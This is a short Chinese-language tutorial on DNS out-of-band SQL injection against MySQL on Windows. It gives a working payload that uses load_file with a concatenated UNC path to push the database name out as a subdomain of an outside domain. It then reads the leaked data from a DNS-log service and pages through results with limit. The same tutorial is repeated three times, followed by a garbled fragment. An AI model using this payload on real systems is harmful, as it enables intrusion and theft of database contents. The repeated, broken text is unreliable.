DNS注入

前提:
● 所入侵的服务器可以访问外部网站
● 目标是盲注
● 对方mysql版本不高(mysql稍微高一点的版本,默认是不可以读取内容)
● 目标是windows平台
思路:通过一些特殊语句,在注入的时候让对方服务器访问特定网站,将原来的盲注变成错注入,从而通过dns-log获取对方信息。
比较好用的dns-log平台有:https://www.fuzz.red/

操作步骤:
1.和正常的sql注入没有区别,先闭合
2.构造语句让服务器访问特定的网址。
这里介绍一个函数:load_file(' ')
load_file 本来是读取文件的函数,该函数不支持http,但是一般windows自带UNC路径即可以通过UNC路径访问互联网,UNC路径前加两个斜杠如( //tjr181.com )由于该函数要读取文件,因此在UNC路径后加一个文件的路径如( //tjr181.com/1.txt ),但该文件路径不一定是真实存在的,也可以是你瞎编的,毕竟你的电脑也不知道究竟是不是真实存在的(笑),如何构造语句呢?就要用到我们的老朋友拼接函数了,比如说我想获得他的数据库名,就写://tjr181.com/?id=1 or load_file(concat('//',database(),'.tjr181.com/1.txt')) 访问的结果是 database().tjr181.com/1.txt
需要注意的是,每次只能有一个数据被访问,因此需要加limit 0,1,访问下一个时,改为limit 1,1。

3.查看dns日志来获取信息
这时候,对方服务器的信息已经被记录在dns-log文件里了,打开网站查看即可获得对方库,表,字段名。前提:
● 所入侵的服务器可以访问外部网站
● 目标是盲注
● 对方mysql版本不高(mysql稍微高一点的版本,默认是不可以读取内容)
● 目标是windows平台
思路:通过一些特殊语句,在注入的时候让对方服务器访问特定网站,将原来的盲注变成错注入,从而通过dns-log获取对方信息。
比较好用的dns-log平台有:https://www.fuzz.red/

操作步骤:
1.和正常的sql注入没有区别,先闭合
2.构造语句让服务器访问特定的网址。
这里介绍一个函数:load_file(' ')
load_file 本来是读取文件的函数,该函数不支持http,但是一般windows自带UNC路径即可以通过UNC路径访问互联网,UNC路径前加两个斜杠如( //tjr181.com )由于该函数要读取文件,因此在UNC路径后加一个文件的路径如( //tjr181.com/1.txt ),但该文件路径不一定是真实存在的,也可以是你瞎编的,毕竟你的电脑也不知道究竟是不是真实存在的(笑),如何构造语句呢?就要用到我们的老朋友拼接函数了,比如说我想获得他的数据库名,就写://tjr181.com/?id=1 or load_file(concat('//',database(),'.tjr181.com/1.txt')) 访问的结果是 database().tjr181.com/1.txt
需要注意的是,每次只能有一个数据被访问,因此需要加limit 0,1,访问下一个时,改为limit 1,1。

3.查看dns日志来获取信息
这时候,对方服务器的信息已经被记录在dns-log文件里了,打开网站查看即可获得对方库,表,字段名。前提:
● 所入侵的服务器可以访问外部网站
● 目标是盲注
● 对方mysql版本不高(mysql稍微高一点的版本,默认是不可以读取内容)
● 目标是windows平台
思路:通过一些特殊语句,在注入的时候让对方服务器访问特定网站,将原来的盲注变成错注入,从而通过dns-log获取对方信息。
比较好用的dns-log平台有:https://www.fuzz.red/

操作步骤:
1.和正常的sql注入没有区别,先闭合
2.构造语句让服务器访问特定的网址。
这里介绍一个函数:load_file(' ')
load_file 本来是读取文件的函数,该函数不支持http,但是一般windows自带UNC路径即可以通过UNC路径访问互联网,UNC路径前加两个斜杠如( //tjr181.com )由于该函数要读取文件,因此在UNC路径后加一个文件的路径如( //tjr181.com/1.txt ),但该文件路径不一定是真实存在的,也可以是你瞎编的,毕竟你的电脑也不知道究竟是不是真实存在的(笑),如何构造语句呢?就要用到我们的老朋友拼接函数了,比如说我想获得他的数据库名,就写://tjr181.com/?id=1 or load_file(concat('//',database(),'.tjr181.com/1.txt')) 访问的结果是 database().tjr181.com/1.txt
需要注意的是,每次只能有一个数据被访问,因此需要加limit 0,1,访问下一个时,改为limit 1,1。

3.查看dns日志来获取信息
这时候,对方服务器的信息已经被记录在dns-log文件里了,打开网站查看即可获得对方库,表,字段名。
<code></a>PKJAB%B</code>$S6X`M(7[)DLB4.png

无标签
评论区
头像